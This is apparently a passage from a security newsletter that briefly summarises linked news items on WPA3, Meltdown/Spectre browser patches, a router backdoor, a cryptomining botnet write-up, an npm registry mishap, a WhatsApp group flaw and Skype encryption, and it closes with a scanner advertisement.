It will include improved protection against weak passwords, improved setup for devices with a limited interface, and individualized data encryption in open networks. More details will be made available at launch later this year.
Something I only read after I sent the last newsletter. It might be old news to some, but it's important enough to include. So, install those browser updates.
Also, WebKit has an elaborate post on how Meltdown/Spectre impacts them.
If you own one of those, you'll want to update fast. Among the problems is a hard-coded backdoor account (which interestingly is the same backdoor found in a D-Link device a few years back), and it seems trivial to exploit even if it's on a LAN.
An interesting write-up showing how the botnet works. It's written in Python, spreads by brute forcing SSH accounts and exploiting a recent JBoss vulnerability, and uses Pastebin to retrieve new C&C addresses. The author has made about $60.000 in Monero in the last month.
But, luckily, not as serious this time at all. When you're already authenticated as an admin, someone can change your App Store settings using any password. Not terrifying, but of course not confidence inducing either.
Npm's security process mistakenly identified a malicious account and pulled it from the registry. It was a false positive though, and many other packages that depended on it came down with it. The above link gives a short description, and they provided a more elaborate post-mortem here.
Speaking of npm, here's a thought-provoking post on how one could set up a nasty npm module that harvests credit card information. Without it being visible in the code on Github, disabling itself when dev tools are open, and more. Hackernews discussion on it here.
Sounds daunting and got quite a bit of press, but it has severe limitations. The attacker would have to hack into Whatsapp servers, wouldn't see old messages and everyone in the group would see a notification. Hopefully they'll fix it, but no reason to panic.
They're integrating the Signal protocol in a feature called 'Private Conversations'. In there all audio calls and text messages will be encrypted, as will attachments. Encrypted video calls and group chats aren't included yet.
Needless to say, you better be installing updates this week if you get them. This might be useful, its a Github repo that keeps tabs on all rolled-out updates.
Great resource on secure programming for PHP developers.
A nice overview of everything loosely related to Linux that happened last year in security.
Use the dead accurate Netsparker web application security scanner to do the work for you, including eliminating false positives.